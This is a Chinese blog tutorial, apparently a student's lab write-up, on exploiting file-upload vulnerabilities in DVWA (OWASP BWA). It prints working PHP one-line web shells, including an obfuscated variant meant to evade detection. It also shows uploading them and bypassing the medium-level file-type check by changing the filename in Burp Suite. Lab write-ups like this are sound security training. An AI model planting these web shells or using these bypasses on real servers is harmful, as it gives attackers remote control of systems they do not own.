惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Spread Privacy
Spread Privacy
大猫的无限游戏
大猫的无限游戏
F
Fortinet All Blogs
M
MIT News - Artificial intelligence
G
Google Developers Blog
Hacker News: Ask HN
Hacker News: Ask HN
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
H
Help Net Security
V
Visual Studio Blog
WordPress大学
WordPress大学
博客园 - 司徒正美
TaoSecurity Blog
TaoSecurity Blog
Webroot Blog
Webroot Blog
Hugging Face - Blog
Hugging Face - Blog
Application and Cybersecurity Blog
Application and Cybersecurity Blog
W
WeLiveSecurity
C
CERT Recently Published Vulnerability Notes
Y
Y Combinator Blog
S
Schneier on Security
Recent Announcements
Recent Announcements
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
宝玉的分享
宝玉的分享
T
Troy Hunt's Blog
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
博客园 - 三生石上(FineUI控件)
Microsoft Azure Blog
Microsoft Azure Blog
N
News and Events Feed by Topic
A
About on SuperTechFans
小众软件
小众软件
K
Kaspersky official blog
Help Net Security
Help Net Security
V2EX - 技术
V2EX - 技术
P
Proofpoint News Feed
S
Secure Thoughts
IT之家
IT之家
云风的 BLOG
云风的 BLOG
N
Netflix TechBlog - Medium
The Register - Security
The Register - Security
I
Intezer
NISL@THU
NISL@THU
GbyAI
GbyAI
P
Privacy & Cybersecurity Law Blog
T
Threatpost
C
Check Point Blog
Forbes - Security
Forbes - Security
C
Cisco Blogs
AI
AI
Recorded Future
Recorded Future
F
Full Disclosure

猫涅的秘密结社

hackthissite-org 数据库原理相关 关于在与我互动前你可能需要了解的事 信安roadmap 个人主页开发汇报 六级生词速记本——附考后感想 数据结构C++自学相关 NewStarCTF-2025 三款steam付费番茄钟软件测评 夏令营-ai hello-world qt环境下的c++程序编写 新新的年 qq机器人配置二三事 搞点java 读书笔记-当下的力量 网页小修时间 glibc更新记录 Vulhub在线靶场记录 Vulhub记录(旧的) 神奇脚本在哪里-CTF之Pwn BaseCTF高校联合新生赛2024 逆逆逆逆逆向-CTF之reverse 求解 夺旗时间 学学学 渗透测试相关 协议/漏洞/网络 最新的知识点 数据分析相关 zico2解析 OverTheWire-bandit解析 CTF实战相关2 靶机解析-gigachad ctf实战相关1 复习time 开学季 维修时间 小小修整 学校实训-笔记 每周靶机之Beelzebub 读书笔记-如何阅读一本书 DC-4解析 DC-2解析 每周靶机之ted 靶机-DC-1 每周靶机之bob potato解析 xss跨站点脚本攻击 每周靶机之Tommyboy1dot0 owasp命令执行漏洞 owasp文件包含漏洞 每周靶机之WALLABY'S-NIGHTMARE Hackademic.RTB1 owasp与sql注入与sqlmap liunx中sudo服务相关知识 liunx中ssh服务相关知识 moneybox解析 C语言相关1 关于加入aplayer的方式 再来一次 关于在next7.8.0中建设评论功能这件事 目前的进展 编辑小提示
owasp上传漏洞
nirvana_felis · 2023-11-24 · via 猫涅的秘密结社

owasp下载地址:
https://sourceforge.net/projects/owaspbwa/files/
注:如遇dvwa无法更改难度 多半为cookie所致 请随以下教程删除网站的缓存:请点这里

文件上传是 Web 应用的必备功能之一,比如上传头像显示个性化、上传附件共享文件、上传脚本更新网站。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件、exe 程序等,这就造成了文件上传漏洞。

我们先从一句话木马说起

1.一句话木马

<?php @eval($_POST['123']);?>
这便是最简单的一句话木马。
这段php代码被分为以下几个部分:
**@**表示后面即使执行错了,也不会报错。
**eval()**函数表示将括号里的内容当作代码执行。
$_POST[‘123’]表示从页面中获得123这个参数值。
也就是说,该页面只要收到了
123
这个密码,就会按照eval()的逻辑去运行。
只要了解了该文件的路径,便可以对该机器(利用菜刀或蚁剑)为所欲为了。
一句话木马还有很多变种:

1
2
3
4
5
6
<?php @assert($\_REQUEST[123]); ?> // GET 数据从url提交
POST 数据采用隐蔽方式提交
REQUEST即支持GET方式、又支持POST方式
<?php $k="ass"."ert"; $k($\_REQUSET['123']);?>
//利用字符串绕过检测的一句话木马
....以下略

2.渗透过程

owasp下载地址:
https://sourceforge.net/projects/owaspbwa/files/

低等级(Security=low)

我们先通过右下角的view source按钮来观察网页代码 寻找规律
1
可以看到该网站并没有对上传的文件类型与大小做较为明显的防备
漏洞很大
那么我们创建一个1.php 在其中加上代码<?php @eval($_POST['123']);?>
2
随后登陆网站 上传 完事
3
至于kali下载蚁剑的方式:参考资料
我们打开蚁剑 按照网页所给提示 文件被上传在了
http://192.168.246.132/dvwa/hackable/uploads/1.php
url地址中填入前者 在连接密码中填入123
测试链接 然后按保存
测试链接显示成功其实就已经完事了
4
随后研究蚁剑 你便会发现它的功能全备 非常厉害

中等级 (Security=medium)

我们先通过DVWA Security将安全度调整至medium
5
然后继续进入上传漏洞网页 view source
6
可以看到这次的上传对上传的文件类型上传的文件大小做了限制
文件类型限制为jpeg文件 大小限制在了100000byte以内(1KB=1024B byte=B=字节)
文件大小由于使用一句话木马 因此可以轻松解决
文件类型的问题则可以使用多种方法来解析

1)利用burpsuite

关于burpsuite的配置
7
proxy-proxy setting中设置本地地址与端口
8
9
配置firefox中的设置-proxy settings 注意ip与端口要与前者保持一致
10
进入上传漏洞的网页 按这个按钮就能开始监听
先分析一下刚才得到的条件:
文件类型仅限jpeg
那我们便将一句话木马.php文件的后缀更改为jpeg交给前端 通过burpsuite更改后缀来修改成php文件类型
那么开始实践
11
1.php复制一份备份 其中一份更名为1.jpeg
开启burpsuite的监听 将1.jpeg上传至网站 等待拦截结果
12
网站一直处于加载中 且burpsuite显示拦截结果 说明成功拦截
我们将filename=“1.jpeg”更改为filename=“1.php”
随后点击forward放行
14
15
可以看到上传成功 我们继续在蚁剑里测试
16
好的 链接也成功了 这说明目标已完成